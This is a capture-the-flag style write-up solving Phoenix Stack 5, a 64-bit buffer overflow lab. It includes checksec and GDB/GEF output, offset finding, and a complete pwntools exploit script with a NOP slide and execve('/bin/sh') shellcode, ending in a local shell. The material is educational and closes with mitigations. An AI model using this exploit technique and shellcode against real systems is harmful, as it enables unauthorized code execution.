Simple 64-bit buffer overflow with shellcode

Introduction

A buffer overflow is a common vulnerability that has plagued software for decades. It occurs when a program writes data past the end of a buffer, so the extra data overwrites adjacent memory. This can lead to crashes, security breaches, and even the execution of malicious code. One of the most powerful ways to exploit a buffer overflow is to inject shellcode through the overflowed buffer, which lets an attacker take control of the program and execute arbitrary commands. In this blog post, we will explore the basics of buffer overflow attacks and demonstrate how to execute shellcode by solving Stack 5 from Phoenix.

Summary

This level from Phoenix is a simple 64-bit buffer overflow: we overflow the buffer and overwrite the saved return address so that execution returns to shellcode that we have placed on the stack.

Binary analysis

One of the first things I do when I have a binary is run file on it:

$ file ./stack-five

./stack-five: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped

From this output we know that we are working with a 64-bit binary. We also know that it is dynamically linked and not stripped, so its symbol names are intact, which would make reverse engineering much easier if we needed to do it.

Source code

Since we are provided with the source code, we won’t have to do any disassembling or reverse engineering to figure out how this binary works.

/*
 * phoenix/stack-five, by https://exploit.education
 *
 * Can you execve("/bin/sh", ...) ?
 *
 * What is green and goes to summer camp? A brussel scout.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

In the comments, we are given a hint that we need to run execve("/bin/sh"), but execve() is not called anywhere in the source code. If we check the security measures applied using checksec from pwntools:

$ checksec ./stack-five

[*] '/opt/phoenix/amd64/stack-five'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
    RPATH:    '/opt/phoenix/x86_64-linux-musl/lib'

We see that NX (no-execute, which marks the stack as non-executable) is disabled, along with all the other security measures. So it is now clear that we are going to need to inject our own shellcode.

Starting with the main function: it simply prints the banner and then calls start_level(), which defines a 128-byte buffer and uses gets() (a notoriously dangerous C function) to read user input into it without any check on the length of the input.

Running

Now that we know what it does, we can run it

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
hello

As we saw in the source it just takes input and exits.

Now let’s see what happens when we give it a big input

user@phoenix-amd64:/opt/phoenix/amd64$ python3 -c "print('A' * 200)" | ./stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
Segmentation fault

A segmentation fault! That means the program accessed memory it wasn’t supposed to.
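To picture what the crash means, here is a toy model in plain Python (not the real process). It assumes a frame in which the 128-byte buffer is followed directly by the 8-byte saved rbp and the 8-byte return address. That layout, the helper names, and the zeroed saved rbp are assumptions for illustration only.

```python
import struct

BUFFER_SIZE = 128  # char buffer[128] from the source

# Hypothetical frame, low to high address: buffer | saved rbp | return address.
frame = bytearray(BUFFER_SIZE + 8 + 8)
# The call at main+30 pushes the address of the next instruction (main+35).
frame[-8:] = struct.pack("<Q", 0x4005c7)


def unchecked_gets(frame: bytearray, data: bytes) -> bytearray:
    """Copy data to the start of the frame with no bounds check, like gets()."""
    out = bytearray(frame)
    if len(data) > len(out):
        # Writing past the modelled frame just keeps going up the stack.
        out.extend(bytes(len(data) - len(out)))
    out[:len(data)] = data
    return out


def saved_return_address(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address slot of the toy frame."""
    return struct.unpack("<Q", frame[BUFFER_SIZE + 8:BUFFER_SIZE + 16])[0]


safe = unchecked_gets(frame, b"hello")
smashed = unchecked_gets(frame, b"A" * 200)

print(hex(saved_return_address(safe)))     # return address untouched
print(hex(saved_return_address(smashed)))  # return address is now all 'A' bytes
```

In this model the short input leaves the return address alone, while 200 bytes replace it with 0x4141414141414141, an address the program cannot return to.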

Finding offset

To find the offset I will open the program in GDB with GEF, which comes with useful tools for exploit development. GEF also comes pre-installed on the Phoenix machine.

gef➤  pattern create 200
[+] Generating a pattern of 200 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
[+] Saved as '$_gef0'
gef➤

Using the pattern create command in GEF we can create a pattern that is unique for every 8 bytes, which will make it easy to find.
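For intuition about how such a pattern can be built, here is a minimal sketch of a de Bruijn sequence generator in plain Python. It is not GEF's implementation. The function name de_bruijn and the lowercase alphabet are assumptions, chosen because they reproduce the 200 bytes shown above.

```python
from itertools import islice
import string


def de_bruijn(alphabet: str, n: int):
    """Yield a de Bruijn sequence in which no length-n window repeats."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            # Emit the current word only when its period divides n.
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


# Take only the first 200 characters, as "pattern create 200" does.
pattern = "".join(islice(de_bruijn(string.ascii_lowercase, 8), 200))
print(pattern[:32])
```

Because no 8-byte window repeats, any 8 bytes that end up in a register identify exactly one position in the input.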

Now we can run the program again, supply this pattern, and find which of the unique 8-byte chunks from the pattern ended up in rip.

gef➤  r
Starting program: /opt/phoenix/amd64/stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Program received signal SIGSEGV, Segmentation fault.

The program crashes as expected and GEF has hooks set up to print the registers, stack and instructions.

Looking through the registers output we see:

$rip   : 0x6161616161616172 ("raaaaaaa"?)

The instruction pointer was overwritten with raaaaaaa, meaning whatever we place at that position in our input will become our new rip.

Now we use pattern search to find where that is in the pattern string:

gef➤  pattern search 0x6161616161616172
[+] Searching '0x6161616161616172'
[+] Found at offset 136 (little-endian search) likely
[+] Found at offset 129 (big-endian search)
gef➤

From the binary analysis we know that this binary is little-endian, so the offset is 136. That is consistent with the 128-byte buffer followed by the 8-byte saved rbp.
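The lookup GEF performs can be reproduced by hand. The sketch below, in plain Python, rebuilds the same 200-byte pattern (each 8-byte chunk is a distinct letter followed by seven a's), packs the crashed rip value in both byte orders, and searches for it. The variable names are illustrative.

```python
import struct

# Rebuild the 200-byte pattern shown above: "aaaaaaaa", "baaaaaaa", ..., "yaaaaaaa".
pattern = b"".join(
    bytes([letter]) + b"a" * 7 for letter in b"abcdefghijklmnopqrstuvwxy"
)

crashed_rip = 0x6161616161616172

# x86-64 stores integers least significant byte first (little-endian).
little = struct.pack("<Q", crashed_rip)  # b"raaaaaaa"
big = struct.pack(">Q", crashed_rip)     # b"aaaaaaar"

offset_le = pattern.find(little)
offset_be = pattern.find(big)
print(offset_le, offset_be)  # 136 129
```

Only the little-endian result matters here, because that is how the CPU reads the 8 bytes back from the stack.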

Crafting exploit

We can now start working on the exploit

#!/usr/bin/env python3

from pwn import *

# Defining binary
exe = context.binary = ELF('./stack-five', checksec=False)
p = process(exe.path)
context.update(arch="amd64")

# The offset and padding we need to overflow the buffer
OFFSET  = 136
PADDING = b'A' * OFFSET

I am using the pwntools library: I create an ELF binary object, start the process so the script can interact with the program, and set the architecture.

Payload

So far our exploit only pads up to the point where the saved return address (the future rip) is overwritten. The first part of the payload after the padding will be the address to write into rip, then comes a nop slide to make sure we hit our shellcode, and finally the shellcode itself.

When performing a buffer overflow attack, a NOP slide can help an attacker hit their shellcode by creating a region of uncertainty about the exact location of the code. By inserting a large block of NOP instructions in between the code and the shellcode, an attacker can increase the chances of their shellcode being executed, even if they do not know the exact location of the code they are trying to overwrite. - ChatGPT

Step 1 - Find stack address

I want to make sure I have the stack address at the point where the main function would return.

We can do that by first adding a breakpoint at the return instruction of main() in GDB.

To see the addresses of the instructions we can disassemble the function:

gef➤  disas main
Dump of assembler code for function main:
   0x00000000004005a4 <+0>:	push   rbp
   0x00000000004005a5 <+1>:	mov    rbp,rsp
   0x00000000004005a8 <+4>:	sub    rsp,0x10
   0x00000000004005ac <+8>:	mov    DWORD PTR [rbp-0x4],edi
   0x00000000004005af <+11>:	mov    QWORD PTR [rbp-0x10],rsi
   0x00000000004005b3 <+15>:	mov    edi,0x400620
   0x00000000004005b8 <+20>:	call   0x400400 <puts@plt>
   0x00000000004005bd <+25>:	mov    eax,0x0
   0x00000000004005c2 <+30>:	call   0x40058d <start_level>
   0x00000000004005c7 <+35>:	mov    eax,0x0
   0x00000000004005cc <+40>:	leave
   0x00000000004005cd <+41>:	ret
End of assembler dump.
gef➤  b *0x4005cd
Breakpoint 1 at 0x4005cd
gef➤

The address we are interested in is the last one (ret), which is 0x4005cd. We don’t need to type the leading zeros because they do not change the value of the address.

Now we run the program with normal input and it stops at the breakpoint.

From here we use info registers to look at the registers

gef➤  info registers
...
...
rsp            0x7fffffffebe8      0x7fffffffebe8
...
...
gef➤

This is the value of the stack pointer when main() is about to return. We can now use it in the exploit:

rip = p64(0x7fffffffebe8 + 40) # new rip -> rsp

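Notice I am also adding 40 to the address. The nop slide starts a little below this rsp value, so the extra offset moves the target deeper into the slide and leaves some slack in case the stack sits at a slightly different address when the program runs outside GDB.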
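To check that this target really lands inside the nop slide, the stack arithmetic can be sketched in plain Python. The frame layout is an assumption read off the disassembly of main() above (push rbp, then sub rsp,0x10, then the call that pushes the return address). The 100-byte slide length matches the value used in the next step, and all names are illustrative.

```python
RSP_AT_MAIN_RET = 0x7fffffffebe8  # rsp at main's ret, from info registers

# On entry to main, rsp points at the same slot. After that:
#   push rbp      -> 8 bytes
#   sub rsp,0x10  -> 16 bytes
#   call          -> 8 bytes for start_level's return address
ret_slot = RSP_AT_MAIN_RET - 8 - 0x10 - 8  # where our new rip is written

NOP_SLIDE_LEN = 100
sled_start = ret_slot + 8              # payload bytes right after the new rip
sled_end = sled_start + NOP_SLIDE_LEN  # first byte of the shellcode

target = RSP_AT_MAIN_RET + 40          # value used for rip in the exploit

print(hex(sled_start), hex(target), hex(sled_end))
print("bytes into the slide:", target - sled_start)
```

Under these assumptions the target falls 64 bytes into the 100-byte slide, which leaves room on both sides if the stack moves a little.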

Step 2 - nop slide

This part is pretty simple. The opcode of a nop instruction is 0x90, which we write as the raw byte \x90 in the code:

nop_slide = b'\x90' * 100

Step 3 - Shellcode

For this part we could find shellcode online that executes execve("/bin/sh") on an amd64 Linux system, but I am going to use shellcraft from the pwntools library to generate it.

shellcode = asm(shellcraft.linux.sh())

I did not have to specify the architecture because I set the context at the start of the script.

shellcraft.linux.sh() returns the assembly source for executing execve("/bin/sh"), and asm() assembles it into the raw shellcode bytes.
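The generated assembly (listed in full in the final exploit below) builds its strings from integer immediates. As a small sanity check in plain Python, the constants decode as follows. The values are copied from that listing, and the variable names are illustrative.

```python
import struct

# mov rax, 0x732f2f2f6e69622f ; push rax  -> first eight bytes of the path
path_low = struct.pack("<Q", 0x732f2f2f6e69622f)
# push 0x68 -> pushed first, so it sits just above path_low in memory
path_high = struct.pack("<Q", 0x68)

# Memory read upward from rsp, cut at the first NUL terminator.
path = (path_low + path_high).split(b"\x00")[0]
print(path)  # b'/bin///sh'

# push 0x1010101 ^ 0x6873 ; xor dword ptr [rsp], 0x1010101
# The XOR keeps zero bytes out of the encoded immediate.
encoded = 0x1010101 ^ 0x6873
argv0 = struct.pack("<I", encoded ^ 0x1010101).rstrip(b"\x00")
print(argv0)  # b'sh'

SYS_EXECVE = 0x3b  # syscall number the shellcode loads into rax
```

The extra slashes in /bin///sh pad the path to fit the pushes cleanly, and the kernel treats repeated slashes as one.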

Exploiting

Now that we have the payload set up, the final exploit will be:

#!/usr/bin/env python3

from pwn import *

# Defining binary
exe = context.binary = ELF('./stack-five', checksec=False)
p = process(exe.path)
context.update(arch="amd64")

# The offset and padding we need to overflow the buffer
OFFSET  = 136
PADDING = b'A' * OFFSET

# Building payload
rip = p64(0x7fffffffebe8 + 40) # new rip -> rsp
nop_slide = b'\x90' * 100
shellcode = asm(shellcraft.linux.sh()) # shellcraft returns the assembly shown below; asm() assembles it into raw bytes

'''
Shellcode in assembly:
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''

# Finally, putting them together into one payload
payload = PADDING + rip + nop_slide + shellcode

# Sending the payload
p.sendlineafter(b'education\n', payload)

# Going into interactive mode to interact with new shell
p.interactive()

We use p.sendlineafter() to send the payload to the process right after the banner is printed.

Then we go into interactive mode to input commands into the new /bin/sh process.

user@phoenix-amd64:/opt/phoenix/amd64$ ./solve_stack-five.py
[+] Starting local process '/opt/phoenix/amd64/stack-five': pid 1219
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)

Success!

Mitigation

This exploit would have been far harder if address space layout randomization (ASLR) was enabled on this machine, since the hardcoded stack address would change between runs, and it would not work as written if the program was compiled with NX enabled, which marks the stack as non-executable. Since this is a VM made for exploit education, those mitigations were turned off, but in a real-world scenario they should always be enabled.